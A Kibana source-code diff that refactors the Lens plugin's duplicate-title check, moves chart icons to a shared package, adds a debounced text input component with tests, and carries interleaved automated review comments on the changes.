@@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { ThrowReporter } from 'io-ts/lib/ThrowReporter'; import { TIMESTAMP_FIELD } from '../../../common/constants'; import { MetricsAPIRequest, MetricsAPIResponse, afterKeyObjectRT } from '../../../common/http_api'; diff --git a/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts b/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts index 97a0707a4c215..bc93d1f539e2a 100644 --- a/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts +++ b/x-pack/plugins/infra/server/routes/metadata/lib/get_node_info.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { first, startsWith } from 'lodash'; import type { InfraPluginRequestHandlerContext } from '../../../types'; import { KibanaFramework } from '../../../lib/adapters/framework/kibana_framework_adapter'; diff --git a/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts b/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts index 6d41f17a6bb5e..de797385c7171 100644 --- a/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts +++ b/x-pack/plugins/infra/server/utils/create_afterkey_handler.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { InfraDatabaseSearchResponse } from '../lib/adapters/framework'; export const createAfterKeyHandler = diff --git a/x-pack/plugins/lens/public/app_plugin/app.scss b/x-pack/plugins/lens/public/app_plugin/app.scss index 58ecce5592937..3aa98ca1640b9 100644 --- a/x-pack/plugins/lens/public/app_plugin/app.scss +++ b/x-pack/plugins/lens/public/app_plugin/app.scss 
@@ -19,25 +19,6 @@ flex-grow: 1; } -.lensChartIcon__subdued { - fill: $euiTextSubduedColor; - - .lnsLayerChartSwitch__item-isSelected & { - fill: currentColor; - } -} - -.lensChartIcon__accent { - fill: $euiColorVis0; - - .lnsLayerChartSwitch__item-isSelected & { - fill: makeGraphicContrastColor($euiColorVis0, $euiColorDarkShade); - } -} -.lensAnnotationIconNoFill { - fill: none; -} - .lensAnnotationIconFill { fill: $euiColorEmptyShade; } diff --git a/x-pack/plugins/lens/public/app_plugin/app.test.tsx b/x-pack/plugins/lens/public/app_plugin/app.test.tsx index a2e247cc427c8..03cf38f141f0d 100644 --- a/x-pack/plugins/lens/public/app_plugin/app.test.tsx +++ b/x-pack/plugins/lens/public/app_plugin/app.test.tsx @@ -882,8 +882,7 @@ describe('Lens App', () => { }); }); expect(checkForDuplicateTitle).toHaveBeenCalledWith( - expect.objectContaining({ id: '123' }), - false, + expect.objectContaining({ id: '123', isTitleDuplicateConfirmed: false }), onTitleDuplicate, expect.anything() ); diff --git a/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx b/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx index 6769010d8f721..373d632b2d51e 100644 --- a/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx +++ b/x-pack/plugins/lens/public/app_plugin/save_modal_container.tsx @@ -251,15 +251,13 @@ export const runSaveLensVisualization = async ( { id: originalSavedObjectId, title: docToSave.title, - copyOnSave: saveProps.newCopyOnSave, + displayName: i18n.translate('xpack.lens.app.saveModalType', { + defaultMessage: 'Lens visualization', + }), lastSavedTitle: lastKnownDoc.title, - getEsType: () => 'lens', - getDisplayName: () => - i18n.translate('xpack.lens.app.saveModalType', { - defaultMessage: 'Lens visualization', - }), + copyOnSave: saveProps.newCopyOnSave, + isTitleDuplicateConfirmed: saveProps.isTitleDuplicateConfirmed, }, - saveProps.isTitleDuplicateConfirmed, saveProps.onTitleDuplicate, { savedObjectsClient, 
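Review bot: In `save_modal_container.tsx` the rewritten `checkForDuplicateTitle` call drops `getEsType: () => 'lens'` and nothing in the new props object carries a saved-object type, while `displayName` (the old `getDisplayName`) is kept. If the updated `checkForDuplicateTitle` resolves the type from elsewhere that is fine; otherwise the duplicate-title lookup would presumably no longer be scoped to Lens saved objects, which is worth confirming against the new signature (not visible here). `runSaveLensVisualization` starts and ends outside the hunk, and the test update in `app.test.tsx` only asserts on `id` and `isTitleDuplicateConfirmed`, so it would not catch a lost type argument.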
diff --git a/x-pack/plugins/lens/public/assets/annotation_icons/circle.tsx b/x-pack/plugins/lens/public/assets/annotation_icons/circle.tsx deleted file mode 100644 index fe19dc7e4c8fc..0000000000000 --- a/x-pack/plugins/lens/public/assets/annotation_icons/circle.tsx +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import * as React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; - -export const IconCircle = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - -); diff --git a/x-pack/plugins/lens/public/assets/annotation_icons/triangle.tsx b/x-pack/plugins/lens/public/assets/annotation_icons/triangle.tsx deleted file mode 100644 index 9924c049004cf..0000000000000 --- a/x-pack/plugins/lens/public/assets/annotation_icons/triangle.tsx +++ /dev/null @@ -1,30 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import * as React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; - -export const IconTriangle = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_area.tsx b/x-pack/plugins/lens/public/assets/chart_area.tsx deleted file mode 100644 index 664735205d97e..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_area.tsx +++ /dev/null 
@@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartArea = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar.tsx b/x-pack/plugins/lens/public/assets/chart_bar.tsx deleted file mode 100644 index 991c9a6c74ced..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar.tsx +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBar = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_horizontal.tsx b/x-pack/plugins/lens/public/assets/chart_bar_horizontal.tsx deleted file mode 100644 index dfd25158cc295..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_horizontal.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarHorizontal = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); 
diff --git a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_percentage.tsx b/x-pack/plugins/lens/public/assets/chart_bar_horizontal_percentage.tsx deleted file mode 100644 index a3c79991f2aff..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_percentage.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarHorizontalPercentage = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_stacked.tsx b/x-pack/plugins/lens/public/assets/chart_bar_horizontal_stacked.tsx deleted file mode 100644 index d6abbaa37aaa0..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_horizontal_stacked.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarHorizontalStacked = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_percentage.tsx b/x-pack/plugins/lens/public/assets/chart_bar_percentage.tsx deleted file mode 100644 index c297ee831f27c..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_percentage.tsx +++ /dev/null 
@@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarPercentage = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_stacked.tsx b/x-pack/plugins/lens/public/assets/chart_bar_stacked.tsx deleted file mode 100644 index c5775ce4bf859..0000000000000 --- a/x-pack/plugins/lens/public/assets/chart_bar_stacked.tsx +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LensIconChartBarStacked = ({ - title, - titleId, - ...props -}: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx index 7eff9a5961e83..7f0034ad73366 100644 --- a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx +++ b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/suggestion_panel.test.tsx 
@@ -19,7 +19,7 @@ import { ReactExpressionRendererType } from '@kbn/expressions-plugin/public'; import { SuggestionPanel, SuggestionPanelProps, SuggestionPanelWrapper } from './suggestion_panel'; import { getSuggestions } from './suggestion_helpers'; import { EuiIcon, EuiPanel, EuiToolTip, EuiAccordion } from '@elastic/eui'; -import { LensIconChartDatatable } from '../../assets/chart_datatable'; +import { IconChartDatatable } from '@kbn/chart-icons'; import { mountWithProvider } from '../../mocks'; import { applyChanges, @@ -286,7 +286,7 @@ describe('suggestion_panel', () => { getSuggestionsMock.mockReturnValue([ { datasourceState: {}, - previewIcon: LensIconChartDatatable, + previewIcon: IconChartDatatable, score: 0.5, visualizationState: suggestion1State, visualizationId: 'testVis', @@ -317,7 +317,7 @@ describe('suggestion_panel', () => { expect(instance.find(SELECTORS.SUGGESTIONS_PANEL).find(EuiIcon)).toHaveLength(1); expect(instance.find(SELECTORS.SUGGESTIONS_PANEL).find(EuiIcon).prop('type')).toEqual( - LensIconChartDatatable + IconChartDatatable ); }); diff --git a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx index 8f32ff75c51f0..1d575d9809ad4 100644 --- a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx +++ b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/geo_field_workspace_panel.tsx 
@@ -10,9 +10,9 @@ import { EuiPageContentBody, EuiText } from '@elastic/eui'; import { FormattedMessage } from '@kbn/i18n-react'; import { i18n } from '@kbn/i18n'; import { UiActionsStart, VISUALIZE_GEO_FIELD_TRIGGER } from '@kbn/ui-actions-plugin/public'; +import { GlobeIllustration } from '@kbn/chart-icons'; import { getVisualizeGeoFieldMessage } from '../../../utils'; import { DragDrop } from '../../../drag_drop'; -import { GlobeIllustration } from '../../../assets/globe_illustration'; import { APP_ID } from '../../../../common/constants'; import './geo_field_workspace_panel.scss'; diff --git a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx index 9d23dd28b3707..07e5b0a3e8c1f 100644 --- a/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx +++ b/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx @@ -23,9 +23,9 @@ import { EuiSpacer, EuiTextColor, } from '@elastic/eui'; -import type { CoreStart, ApplicationStart } from '@kbn/core/public'; +import type { CoreStart } from '@kbn/core/public'; import type { DataPublicPluginStart, ExecutionContextSearch } from '@kbn/data-plugin/public'; -import { RedirectAppLinks } from '@kbn/kibana-react-plugin/public'; +import { RedirectAppLinks } from '@kbn/shared-ux-link-redirect-app'; import type { ExpressionRendererEvent, ExpressionRenderError, @@ -35,6 +35,7 @@ import type { UiActionsStart } from '@kbn/ui-actions-plugin/public'; import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; import type { DefaultInspectorAdapters } from '@kbn/expressions-plugin/common'; import type { Datatable } from '@kbn/expressions-plugin/public'; +import { DropIllustration } from '@kbn/chart-icons'; import { trackUiCounterEvents } from '../../../lens_ui_telemetry'; import { FramePublicAPI, 
@@ -51,7 +52,6 @@ import { DragDrop, DragContext, DragDropIdentifier } from '../../../drag_drop'; import { switchToSuggestion } from '../suggestion_helpers'; import { buildExpression } from '../expression_helpers'; import { WorkspacePanelWrapper } from './workspace_panel_wrapper'; -import { DropIllustration } from '../../../assets/drop_illustration'; import applyChangesIllustrationDark from '../../../assets/render_dark@2x.png'; import applyChangesIllustrationLight from '../../../assets/render_light@2x.png'; import { @@ -547,7 +547,7 @@ export const InnerWorkspacePanel = React.memo(function InnerWorkspacePanel({ setLocalState={setLocalState} localState={{ ...localState, configurationValidationError, missingRefsErrors }} ExpressionRendererComponent={ExpressionRendererComponent} - application={core.application} + core={core} activeDatasourceId={activeDatasourceId} onRender$={onRender$} onData$={onData$} @@ -622,7 +622,7 @@ export const VisualizationWrapper = ({ setLocalState, localState, ExpressionRendererComponent, - application, + core, activeDatasourceId, onRender$, onData$, @@ -643,7 +643,7 @@ export const VisualizationWrapper = ({ unknownVisError?: Array<{ shortMessage: string; longMessage: React.ReactNode }>; }; ExpressionRendererComponent: ReactExpressionRendererType; - application: ApplicationStart; + core: CoreStart; activeDatasourceId: string | null; onRender$: () => void; onData$: (data: unknown, adapters?: Partial) => void; 
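Review bot: `VisualizationWrapper` now takes the whole `core: CoreStart` where it previously took only `application: ApplicationStart`, yet the visible code in the `@@ -766` hunk still reads nothing beyond `core.application.capabilities`, so the prop's surface has grown without the hunk showing why. Presumably the wider object is needed by the new `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app`, whose usage sits after `return (` and is not legible here; if so, a one-line comment on the prop, `// full CoreStart is required by RedirectAppLinks; the rest of this component only reads core.application`, would keep a later cleanup from narrowing it back and breaking the link redirect. If that is not the reason, the narrower `application` prop is the smaller dependency and should stay. The `VisualizationWrapper` signature continues outside this hunk.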
@@ -766,18 +766,18 @@ export const VisualizationWrapper = ({ if (localState.missingRefsErrors?.length) { // Check for access to both Management app && specific indexPattern section - const { management: isManagementEnabled } = application.capabilities.navLinks; + const { management: isManagementEnabled } = core.application.capabilities.navLinks; const isIndexPatternManagementEnabled = - application.capabilities.management.kibana.indexPatterns; + core.application.capabilities.management.kibana.indexPatterns; return ( + {!incompleteInfo && selectedColumn && temporaryState === 'none' && ( { diff --git a/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx b/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx index 02ca96e147605..1ec3c3b41ca40 100644 --- a/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx +++ b/x-pack/plugins/lens/public/indexpattern_datasource/field_item.tsx @@ -452,7 +452,12 @@ function FieldItemPopoverContents(props: State & FieldItemProps) { let title = <>; if (props.isLoading) { - return ; + return ( + <> + {panelHeader} + + + ); } else if (field.type.includes('range')) { return ( <> diff --git a/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx b/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx index 50eb6df5723f7..40b2f66b2b93d 100644 --- a/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx +++ b/x-pack/plugins/lens/public/indexpattern_datasource/operations/definitions/date_histogram.tsx @@ -457,7 +457,7 @@ export const dateHistogramOperation: OperationDefinition< ); }, helpComponentTitle: i18n.translate('xpack.lens.indexPattern.dateHistogram.titleHelp', { - defaultMessage: 'How auto date histogram works', + defaultMessage: 'How Date histogram works', }), helpComponent() { const infiniteBound = i18n.translate('xpack.lens.indexPattern.dateHistogram.moreThanYear', { 
@@ -471,14 +471,14 @@ export const dateHistogramOperation: OperationDefinition< <>

{i18n.translate('xpack.lens.indexPattern.dateHistogram.autoBasicExplanation', { - defaultMessage: 'The auto date histogram splits a data field into buckets by interval.', + defaultMessage: 'Date histogram splits data into time intervals.', })}

{UI_SETTINGS.HISTOGRAM_MAX_BARS}, targetBarSetting: {UI_SETTINGS.HISTOGRAM_BAR_TARGET}, diff --git a/x-pack/plugins/lens/public/lens_attribute_service.ts b/x-pack/plugins/lens/public/lens_attribute_service.ts index 6181fbf22ab26..7fe4065ede66d 100644 --- a/x-pack/plugins/lens/public/lens_attribute_service.ts +++ b/x-pack/plugins/lens/public/lens_attribute_service.ts @@ -80,12 +80,11 @@ export function getLensAttributeService( return checkForDuplicateTitle( { title: props.newTitle, - copyOnSave: false, + displayName: DOC_TYPE, + isTitleDuplicateConfirmed: props.isTitleDuplicateConfirmed, lastSavedTitle: '', - getEsType: () => DOC_TYPE, - getDisplayName: () => DOC_TYPE, + copyOnSave: false, }, - props.isTitleDuplicateConfirmed, props.onTitleDuplicate, { savedObjectsClient, diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts index 8d6ca5c3b7640..c04db1f39ac61 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts 
@@ -6,26 +6,24 @@ */ import type { OverlayStart, SavedObjectsClientContract } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import { DOC_TYPE } from '../../../common'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { findObjectByTitle } from './find_object_by_title'; import { displayDuplicateTitleConfirmModal } from './display_duplicate_title_confirm_modal'; +import type { ConfirmModalSavedObjectMeta } from './types'; /** - * check for an existing SavedObject with the same title in ES + * check for an existing saved object with the same title in ES * returns Promise when it's no duplicate, or the modal displaying the warning * that's there's a duplicate is confirmed, else it returns a rejected Promise */ export async function checkForDuplicateTitle( - savedObject: Pick< - SavedObject, - 'id' | 'title' | 'getDisplayName' | 'lastSavedTitle' | 'copyOnSave' | 'getEsType' - >, - isTitleDuplicateConfirmed: boolean, + savedObjectMeta: ConfirmModalSavedObjectMeta, onTitleDuplicate: (() => void) | undefined, services: { savedObjectsClient: SavedObjectsClientContract; overlays: OverlayStart } -): Promise { +): Promise { const { savedObjectsClient, overlays } = services; + const { id, title, isTitleDuplicateConfirmed, lastSavedTitle, copyOnSave } = savedObjectMeta; // Don't check for duplicates if user has already confirmed save with duplicate title if (isTitleDuplicateConfirmed) { 
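Review bot: The saved-object type searched by `findObjectByTitle` is now the hard-coded `DOC_TYPE` (second hunk of this file) while `displayName` still arrives per call inside `ConfirmModalSavedObjectMeta`, so the two can drift: a caller passing any other display name would still be checked against Lens objects only, and nothing in the signature says so. The docblock should state the narrowed scope; proposed first line: `* check for an existing Lens saved object (DOC_TYPE) with the same title in ES`. A second line, `* isTitleDuplicateConfirmed and copyOnSave on the meta object short-circuit or force the check respectively`, would document the two early returns now that those flags travel in the meta object instead of as separate arguments.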
@@ -34,17 +32,13 @@ export async function checkForDuplicateTitle( // Don't check if the user isn't updating the title, otherwise that would become very annoying to have // to confirm the save every time, except when copyOnSave is true, then we do want to check. - if (savedObject.title === savedObject.lastSavedTitle && !savedObject.copyOnSave) { + if (title === lastSavedTitle && !copyOnSave) { return true; } - const duplicate = await findObjectByTitle( - savedObjectsClient, - savedObject.getEsType(), - savedObject.title - ); + const duplicate = await findObjectByTitle(savedObjectsClient, DOC_TYPE, title); - if (!duplicate || duplicate.id === savedObject.id) { + if (!duplicate || duplicate.id === id) { return true; } @@ -55,5 +49,5 @@ export async function checkForDuplicateTitle( // TODO: make onTitleDuplicate a required prop and remove UI components from this class // Need to leave here until all users pass onTitleDuplicate. - return displayDuplicateTitleConfirmModal(savedObject, overlays); + return displayDuplicateTitleConfirmModal(savedObjectMeta, overlays); } diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx b/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx index c788660eea647..9b24a2be54ce2 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/confirm_modal_promise.tsx @@ -16,7 +16,7 @@ export function confirmModalPromise( title = '', confirmBtnText = '', overlays: OverlayStart -): Promise { +): Promise { return new Promise((resolve, reject) => { const cancelButtonText = i18n.translate('xpack.lens.confirmModal.cancelButtonLabel', { defaultMessage: 'Cancel', 
diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts index 6c5a94c8c3216..e0c61d202da72 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts @@ -7,25 +7,25 @@ import { i18n } from '@kbn/i18n'; import type { OverlayStart } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import type { ConfirmModalSavedObjectMeta } from './types'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { confirmModalPromise } from './confirm_modal_promise'; export function displayDuplicateTitleConfirmModal( - savedObject: Pick, + { title, displayName }: ConfirmModalSavedObjectMeta, overlays: OverlayStart -): Promise { +): Promise { const confirmMessage = i18n.translate( 'xpack.lens.confirmModal.saveDuplicateConfirmationMessage', { defaultMessage: `A {name} with the title '{title}' already exists. Would you like to save anyway?`, - values: { title: savedObject.title, name: savedObject.getDisplayName() }, + values: { title, name: displayName }, } ); const confirmButtonText = i18n.translate('xpack.lens.confirmModal.saveDuplicateButtonLabel', { defaultMessage: 'Save {name}', - values: { name: savedObject.getDisplayName() }, + values: { name: displayName }, }); try { return confirmModalPromise(confirmMessage, '', confirmButtonText, overlays); diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts index 0d117220b895b..0e71b30b042e5 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts 
+++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts @@ -6,7 +6,7 @@ */ import { findObjectByTitle } from './find_object_by_title'; -import { SavedObjectsClientContract, SavedObject } from '@kbn/core/public'; +import { SavedObjectsClientContract, SimpleSavedObject } from '@kbn/core/public'; import { simpleSavedObjectMock } from '@kbn/core/public/mocks'; describe('findObjectByTitle', () => { @@ -24,7 +24,8 @@ describe('findObjectByTitle', () => { it('matches any case', async () => { const indexPattern = simpleSavedObjectMock.create(savedObjectsClient, { attributes: { title: 'foo' }, - } as SavedObject); + } as SimpleSavedObject); + savedObjectsClient.find = jest.fn().mockImplementation(() => Promise.resolve({ savedObjects: [indexPattern], diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/types.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/types.ts new file mode 100644 index 0000000000000..49772c2db90a2 --- /dev/null +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/types.ts @@ -0,0 +1,16 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +/** @internal */ +export interface ConfirmModalSavedObjectMeta { + id?: string; + title: string; + displayName: string; + lastSavedTitle: string; + copyOnSave: boolean; + isTitleDuplicateConfirmed: boolean; +} diff --git a/x-pack/plugins/lens/public/shared_components/debounced_input.test.tsx b/x-pack/plugins/lens/public/shared_components/debounced_input.test.tsx new file mode 100644 index 0000000000000..feab19d02c720 --- /dev/null +++ b/x-pack/plugins/lens/public/shared_components/debounced_input.test.tsx 
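Review bot: `ConfirmModalSavedObjectMeta` in the new types.ts carries only an `@internal` tag and no field documentation, although three of its fields steer control flow in `checkForDuplicateTitle`: `isTitleDuplicateConfirmed` skips the duplicate check entirely, `copyOnSave` forces the check even when `title` equals `lastSavedTitle`, and `displayName` is interpolated into the confirm-modal text by `displayDuplicateTitleConfirmModal`. One-line TSDoc comments stating exactly those three facts would let a reader understand the contract without opening both callers. `id` should also note that a found object with the same id is not treated as a duplicate, which is the `duplicate.id === id` check in the caller.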
@@ -0,0 +1,76 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { EuiFieldText } from '@elastic/eui'; +import { mount } from 'enzyme'; +import { DebouncedInput } from './debounced_input'; +import { act } from 'react-dom/test-utils'; + +jest.mock('lodash', () => { + const original = jest.requireActual('lodash'); + + return { + ...original, + debounce: (fn: unknown) => fn, + }; +}); + +describe('DebouncedInput', () => { + it('should render', () => { + const mockOnChange = jest.fn(); + const wrapper = mount( + + ); + + const textProps = wrapper.find(EuiFieldText).props(); + expect(textProps.value).toBe('my value'); + expect(textProps.placeholder).toBe('default value'); + + act(() => { + textProps.onChange!({ + target: { value: 'new value' }, + } as unknown as React.ChangeEvent); + }); + expect(mockOnChange).toHaveBeenCalledWith('new value'); + }); + + it('should update placeholder when default value changes', () => { + const wrapper = mount( + {}} defaultValue={'old default'} /> + ); + + expect(wrapper.find(EuiFieldText).props().placeholder).toBe('old default'); + + act(() => { + wrapper.setProps({ defaultValue: 'new default' }); + }); + + expect(wrapper.find(EuiFieldText).props().placeholder).toBe('new default'); + }); + + it('should forward text field props', () => { + const wrapper = mount( + {}} + defaultValue={'old default'} + /> + ); + + expect(wrapper.find(EuiFieldText).props()).toEqual( + expect.objectContaining({ + compressed: true, + fullWidth: true, + readOnly: true, + }) + ); + }); +}); diff --git a/x-pack/plugins/lens/public/shared_components/debounced_input.tsx b/x-pack/plugins/lens/public/shared_components/debounced_input.tsx new file mode 100644 index 0000000000000..cd309a2bb0bfd --- /dev/null 
+++ b/x-pack/plugins/lens/public/shared_components/debounced_input.tsx @@ -0,0 +1,54 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { EuiFieldText, EuiFieldTextProps } from '@elastic/eui'; +import { useDebouncedValue } from './debounced_value'; + +type Props = { + value: string; + onChange: (value: string) => void; + defaultValue?: string; + allowFalsyValue?: boolean; +} & Omit; + +const DebouncedInputHelper = ({ + onChange, + value, + defaultValue, + allowFalsyValue, + ...rest +}: Props) => { + const { inputValue, handleInputChange, initialValue } = useDebouncedValue( + { + onChange, + value, + defaultValue, + }, + { allowFalsyValue } + ); + + return ( + { + handleInputChange(e.target.value); + }} + placeholder={initialValue} + /> + ); +}; + +/** + * When testing this component, mock the "debounce" function in lodash (see this module test for an example) + */ +export const DebouncedInput = (props: Props) => ( + // need this extra layer to force a rerender whenever the default value changes. + // this is because we need a new initialValue to be computed from the debounce hook. + +); diff --git a/x-pack/plugins/lens/public/shared_components/name_input.tsx b/x-pack/plugins/lens/public/shared_components/name_input.tsx index 9502c7df93d55..e455caa199dd0 100644 --- a/x-pack/plugins/lens/public/shared_components/name_input.tsx +++ b/x-pack/plugins/lens/public/shared_components/name_input.tsx @@ -7,8 +7,8 @@ import React from 'react'; import { i18n } from '@kbn/i18n'; -import { EuiFormRow, EuiFieldText } from '@elastic/eui'; -import { useDebouncedValue } from '.'; +import { EuiFormRow } from '@elastic/eui'; +import { DebouncedInput } from './debounced_input'; export const NameInput = ({ value, 
